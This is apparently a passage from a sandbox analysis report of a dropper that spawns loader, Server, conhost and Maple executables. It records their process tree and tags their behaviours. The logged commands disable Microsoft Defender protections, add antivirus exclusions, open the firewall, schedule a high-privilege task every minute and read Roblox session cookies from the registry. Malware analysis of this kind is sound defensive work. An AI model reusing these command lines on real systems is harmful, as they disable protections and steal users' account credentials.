1492 Maple.exe 92 PID 1492 wrote to memory of 4756 1492 Maple.exe 94 PID 1492 wrote to memory of 4756 1492 Maple.exe 94 PID 1492 wrote to memory of 3824 1492 Maple.exe 96 PID 1492 wrote to memory of 3824 1492 Maple.exe 96 PID 1492 wrote to memory of 3840 1492 Maple.exe 98 PID 1492 wrote to memory of 3840 1492 Maple.exe 98 PID 3076 wrote to memory of 1332 3076 loader.exe 100 PID 3076 wrote to memory of 1332 3076 loader.exe 100 PID 1332 wrote to memory of 3564 1332 Server.exe 101 PID 1332 wrote to memory of 3564 1332 Server.exe 101 PID 1332 wrote to memory of 3564 1332 Server.exe 101 PID 1332 wrote to memory of 4616 1332 Server.exe 102 PID 1332 wrote to memory of 4616 1332 Server.exe 102 PID 3076 wrote to memory of 4148 3076 loader.exe 103 PID 3076 wrote to memory of 4148 3076 loader.exe 103 PID 3076 wrote to memory of 4524 3076 loader.exe 104 PID 3076 wrote to memory of 4524 3076 loader.exe 104 PID 1492 wrote to memory of 4288 1492 Maple.exe 105 PID 1492 wrote to memory of 4288 1492 Maple.exe 105 PID 2940 wrote to memory of 4384 2940 conhost.exe 107 PID 2940 wrote to memory of 4384 2940 conhost.exe 107 PID 2940 wrote to memory of 1964 2940 conhost.exe 109 PID 2940 wrote to memory of 1964 2940 conhost.exe 109 PID 1492 wrote to memory of 1496 1492 Maple.exe 111 PID 1492 wrote to memory of 1496 1492 Maple.exe 111 PID 1492 wrote to memory of 3236 1492 Maple.exe 113 PID 1492 wrote to memory of 3236 1492 Maple.exe 113 PID 2940 wrote to memory of 516 2940 conhost.exe 115 PID 2940 wrote to memory of 516 2940 conhost.exe 115 PID 1492 wrote to memory of 2428 1492 Maple.exe 117 PID 1492 wrote to memory of 2428 1492 Maple.exe 117 PID 1492 wrote to memory of 1728 1492 Maple.exe 119 PID 1492 wrote to memory of 1728 1492 Maple.exe 119 PID 2940 wrote to memory of 3756 2940 conhost.exe 120 PID 2940 wrote to memory of 3756 2940 conhost.exe 120 PID 1492 wrote to memory of 1248 1492 Maple.exe 123 PID 1492 wrote to memory of 1248 1492 Maple.exe 123 PID 4524 wrote to memory of 1520 4524 loader.exe 125 PID 4524 wrote to memory of 1520 4524 loader.exe 125 PID 1520 wrote to memory of 4420 1520 Server.exe 126 PID 1520 wrote to memory of 4420 1520 Server.exe 126 PID 1520 wrote to memory of 4420 1520 Server.exe 126 PID 1520 wrote to memory of 2352 1520 Server.exe 127 PID 1520 wrote to memory of 2352 1520 Server.exe 127 PID 4524 wrote to memory of 4744 4524 loader.exe 128 PID 4524 wrote to memory of 4744 4524 loader.exe 128 PID 4524 wrote to memory of 4840 4524 loader.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 23 IoCs
pid Process 4828 attrib.exe 3740 attrib.exe 1248 attrib.exe 4360 attrib.exe 784 attrib.exe 5028 attrib.exe 2992 attrib.exe 2836 attrib.exe 4648 attrib.exe 2016 attrib.exe 3944 attrib.exe 1580 attrib.exe 4700 attrib.exe 3440 attrib.exe 4920 attrib.exe 816 attrib.exe 1048 attrib.exe 2028 attrib.exe 1212 attrib.exe 1048 attrib.exe 1248 attrib.exe 4580 attrib.exe 1876 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Maple.sfx.exe"C:\Users\Admin\AppData\Local\Temp\Maple.sfx.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2420 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2788
-
-
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3756
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"4⤵
- Views/modifies file attributes
PID:2028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:3236
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1728
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:1248
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4540 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3564
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"4⤵
- Executes dropped EXE
PID:4148
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"6⤵
- Executes dropped EXE
PID:2352
-
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"5⤵
- Executes dropped EXE
PID:4744
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:4840 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2556 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵PID:2280
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"7⤵
- Views/modifies file attributes
PID:1212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4376
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption7⤵PID:2360
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory7⤵PID:1144
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4840
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name7⤵
- Detects videocard installed
PID:3008
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause7⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4276 -
C:\Windows\system32\PING.EXEping localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"7⤵
- Executes dropped EXE
PID:3108
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:4656 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1604
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"8⤵
- Executes dropped EXE
PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
PID:876 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4804
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"9⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2636 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid10⤵PID:4316
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"10⤵
- Views/modifies file attributes
PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 210⤵
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵
- Suspicious behavior: EnumeratesProcesses
PID:4728
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption10⤵PID:3212
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory10⤵PID:1728
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid10⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2676
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name10⤵
- Detects videocard installed
PID:4156
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause10⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1396 -
C:\Windows\system32\PING.EXEping localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
PID:2436 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"10⤵
- Executes dropped EXE
PID:312
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
PID:2708 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"11⤵
- Executes dropped EXE
PID:4144
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
PID:4296 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"12⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2388 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid13⤵PID:1304
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"13⤵
- Views/modifies file attributes
PID:2016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 213⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY13⤵
- Suspicious behavior: EnumeratesProcesses
PID:4908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY13⤵
- Suspicious behavior: EnumeratesProcesses
PID:4408
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption13⤵PID:2032
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory13⤵PID:1496
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid13⤵PID:4140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER13⤵
- Suspicious behavior: EnumeratesProcesses
PID:1008
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name13⤵
- Detects videocard installed
PID:1764
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause13⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2968 -
C:\Windows\system32\PING.EXEping localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4248
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
PID:2532 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"13⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4424
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"13⤵
- Executes dropped EXE
PID:2968
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"14⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4004
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"14⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:3564 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid15⤵PID:3824
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"15⤵
- Views/modifies file attributes
PID:1248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'15⤵
- Command and Scripting Interpreter: PowerShell
PID:3508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 215⤵
- Command and Scripting Interpreter: PowerShell
PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY15⤵
- Command and Scripting Interpreter: PowerShell
PID:2456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY15⤵PID:4080
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption15⤵PID:3060
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory15⤵PID:780
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid15⤵PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER15⤵PID:3044
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name15⤵
- Detects videocard installed
PID:4352
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause15⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4520 -
C:\Windows\system32\PING.EXEping localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
PID:1028 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"15⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"15⤵
- Executes dropped EXE
PID:4524
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"16⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"16⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:3176 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid17⤵PID:3596
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"17⤵
- Views/modifies file attributes
PID:1048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'17⤵
- Command and Scripting Interpreter: PowerShell
PID:1144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 217⤵
- Command and Scripting Interpreter: PowerShell
PID:4316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY17⤵
- Command and Scripting Interpreter: PowerShell
PID:2816
-
-
